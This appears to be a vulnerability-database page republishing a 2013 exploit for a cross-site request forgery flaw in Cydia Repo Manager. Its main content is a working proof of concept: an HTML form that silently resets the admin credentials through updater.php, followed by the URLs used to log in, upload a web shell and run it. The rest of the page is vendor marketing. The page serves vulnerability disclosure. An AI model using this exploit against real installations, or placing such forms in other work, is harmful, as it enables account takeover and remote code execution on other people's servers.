Lucene search
K

Cydia Repo Manager - Cross-Site Request Forgery

🗓️ 16 Jan 2013 00:00:00Reported by Ramdan YantuType 
exploitpack
 exploitpack
👁 17 Views

Cydia Repo Manager CSRF vulnerability by cr4wl3r, affecting Win 7. Form allows unauthorized login, upload of shell, and execution of shell via specific URLs

Code
# Cydia Repo Manager CSRF Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Cydia_Repo_Manager.txt
# Software Link: http://damarist.de/?lang=en
# Download : http://damar1st.de/downloads/CydiaRepoManager3.1.zip
# Tested: Win 7

Proof of concept:

<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
<input type="text" name="user" value="Username"/> <br />
<input type="text" name="pass" value="Password"/><br />
<input type="submit" name="s" value="w00tw00t!" />
</form>


Login :  http://bastardlabs/[CydiaRepoManager_path]/index.php

Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php

Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php


Demo : 
http://bastardlabs.info/demo/CydiaRepoManager1.png
http://bastardlabs.info/demo/CydiaRepoManager2.png
http://bastardlabs.info/demo/CydiaRepoManager3.png

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation